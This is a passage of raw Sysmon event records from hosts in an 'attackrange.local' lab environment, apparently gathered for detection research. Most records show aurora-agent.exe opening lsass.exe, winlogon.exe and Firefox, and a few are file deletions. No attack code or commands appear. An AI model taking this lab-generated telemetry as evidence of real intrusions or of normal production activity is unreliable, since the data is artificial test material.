Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000016696Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:42.536{E5A8D418-DC44-63C7-1C00-00000000B002}20202332C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38850) 10341000x800000000000000042724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.831{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3506-00000000AF02}5804C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.830{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3406-00000000AF02}6288C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3306-00000000AF02}6980C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000042715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.828{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE54542EA977258C0A39A57265D85BAC,SHA256=E253440941F3BB5CF8AC55D8403498B1055B95716E195966F68A098FE14A6F5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.827{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E491-63C7-3206-00000000AF02}5212C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000042709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.826{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000042708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.744{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\pending_pings\344d9b65-2c53-4c48-adc3-34d363b3161cMD5=71DFD642C4A2C4E3987F0B9A4717727B,SHA256=5BE8395AE921BB5B06B424D879F416666DECDDE21D4D4ED9BB7AE3A2F703C4F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.722{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000042696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.700{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000042695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.689{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1696979FD814356A7492BA011077B414,SHA256=59321198DE570FCD9E8C5C41B931A2502B63805C91545CD4CC05B91002E57B87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.649{FE4C2B44-E48F-63C7-3106-00000000AF02}3296ATTACKRANGE\AdministratorC:\Program Files\Mozilla 